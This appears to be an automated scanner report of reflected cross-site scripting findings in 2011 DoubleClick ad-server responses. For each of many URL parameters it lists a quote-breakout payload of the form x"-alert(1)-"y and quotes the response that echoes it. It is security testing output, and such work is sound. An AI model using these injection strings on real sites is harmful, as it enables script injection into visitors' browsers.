document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... nV = 9; var FWH = ' width="300" height="125" '; var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340e57e6"-alert(1)-"48b41a44627&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs% ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d0ff'-alert(1)-'a90a5132410 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:25 GMT
Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=20170023401d0ff'-alert(1)-'a90a5132410&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs% ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd50e"-alert(1)-"43a7c3abbc6 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:40 GMT
Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... ; var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3fd50e"-alert(1)-"43a7c3abbc6&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp://www.bmw.com.au/com/en/newvehicles/x/ ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec1d5'-alert(1)-'7f740edecfd was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:45 GMT
Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... get=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3ec1d5'-alert(1)-'7f740edecfd&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp://www.bmw.com.au/com/en/newvehicles/x/ ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a34ae'-alert(1)-'a50ba774864 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:34 GMT
Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEENa34ae'-alert(1)-'a50ba774864&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp: ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62d24"-alert(1)-"6480d73bfc4 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:29 GMT
Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... var FWH = ' width="300" height="125" '; var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN62d24"-alert(1)-"6480d73bfc4&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp: ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e918"-alert(1)-"98486586506 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:10 GMT
Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... gif"; var minV = 9; var FWH = ' width="300" height="125" '; var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=109283854e918"-alert(1)-"98486586506&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1 ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efee8'-alert(1)-'f5fd40e0f0a was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:15 GMT
Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385efee8'-alert(1)-'f5fd40e0f0a&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1 ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59df8'-alert(1)-'0d6f83edabc was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:05 GMT
Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G59df8'-alert(1)-'0d6f83edabc&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B4 ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cfc7"-alert(1)-"93944cc2a03 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:00 GMT
Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... 300x125_14Mar2011.gif"; var minV = 9; var FWH = ' width="300" height="125" '; var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G4cfc7"-alert(1)-"93944cc2a03&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B4 ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3dc69"-alert(1)-"b1724e75ee9 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6343 Cache-Control: no-cache Pragma: no-cache Date: Mon, 02 May 2011 12:53:50 GMT Expires: Mon, 02 May 2011 12:53:50 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=3dc69"-alert(1)-"b1724e75ee9http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp://www.bmw.com.au/com/en/newvehicles/x/x3/2010/showr ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e382b'-alert(1)-'c8d54a88246 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6343 Cache-Control: no-cache Pragma: no-cache Date: Mon, 02 May 2011 12:53:55 GMT Expires: Mon, 02 May 2011 12:53:55 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... " href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=e382b'-alert(1)-'c8d54a88246http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp://www.bmw.com.au/com/en/newvehicles/x/x3/2010/showr ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1af9'-alert(1)-'24059d22b80 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 02 May 2011 12:52:04 GMT Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!d1af9'-alert(1)-'24059d22b80&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B5776418 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9f0d"-alert(1)-"8875c28e870 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 02 May 2011 12:51:59 GMT Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... et/376153/3-BMW_X3_300x125_14Mar2011.gif"; var minV = 9; var FWH = ' width="300" height="125" '; var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!c9f0d"-alert(1)-"8875c28e870&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B5776418 ...[SNIP]...
The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e39a"-alert(1)-"8d72fc9941b was submitted in the campID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:49:54 GMT Content-Length: 9062
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... AAA=,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=803404e39a"-alert(1)-"8d72fc9941b&crID=110847&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectU ...[SNIP]...
The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3689a"-alert(1)-"6360c3aeebe was submitted in the crID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:50:04 GMT Content-Length: 9062
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=1108473689a"-alert(1)-"6360c3aeebe&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=http%3a%2 ...[SNIP]...
The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4274"-alert(1)-"6749e576522 was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:50:42 GMT Content-Length: 9062
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... ristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=110847&pubICode=1662910&pub=256078&partnerID=9f4274"-alert(1)-"6749e576522&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=http%3a%2f%2fwww.tdameritrade.com/offer/250freetr ...[SNIP]...
The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e70c"-alert(1)-"37993143f63 was submitted in the pub parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:50:29 GMT Content-Length: 9062
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... ational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=110847&pubICode=1662910&pub=2560788e70c"-alert(1)-"37993143f63&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=http%3a%2f%2fwww.tdameritrade.com/off ...[SNIP]...
The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca208"-alert(1)-"8a30c001f0e was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:50:17 GMT Content-Length: 9062
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... .com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=110847&pubICode=1662910ca208"-alert(1)-"8a30c001f0e&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=http%3a%2f%2fwww.tdameritr ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a270"-alert(1)-"84104877d0e was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:49:41 GMT Content-Length: 9062
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... zN2VmNQA4nyoAAAA=,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-1108476a270"-alert(1)-"84104877d0e&campID=80340&crID=110847&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Eh ...[SNIP]...
The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a0b7"-alert(1)-"69532c69136 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:50:56 GMT Content-Length: 9062
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... mpID=80340&crID=110847&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml8a0b7"-alert(1)-"69532c69136&redirectURL=http%3a%2f%2fwww.tdameritrade.com/offer/250freetrades/%3Fa%3DGVQ%26o%3D199%26cid%3DGENRET%3B877237%3B62579218%3B239944197%3B41633480"); var fscUrl = url; var fscUrlClickTagFound = fals ...[SNIP]...
The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1445"-alert(1)-"98a4c2b7cc0 was submitted in the campID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:50:41 GMT Content-Length: 9287
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... .com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340c1445"-alert(1)-"98a4c2b7cc0&crID=110787&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer ...[SNIP]...
The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e83d"-alert(1)-"f2aef3fa5b7 was submitted in the crID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:50:54 GMT Content-Length: 9287
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... inion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=1107875e83d"-alert(1)-"f2aef3fa5b7&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427% ...[SNIP]...
The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79bb7"-alert(1)-"19c0f79625f was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:51:28 GMT Content-Length: 9287
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... emporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=110787&pubICode=1662910&pub=256078&partnerID=979bb7"-alert(1)-"19c0f79625f&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=https%3a%2f%2 ...[SNIP]...
The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd56c"-alert(1)-"d3ec9aaf18e was submitted in the pub parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:51:18 GMT Content-Length: 9287
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... engreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=110787&pubICode=1662910&pub=256078cd56c"-alert(1)-"d3ec9aaf18e&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=h ...[SNIP]...
The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a033"-alert(1)-"9d0261df748 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:51:08 GMT Content-Length: 9287
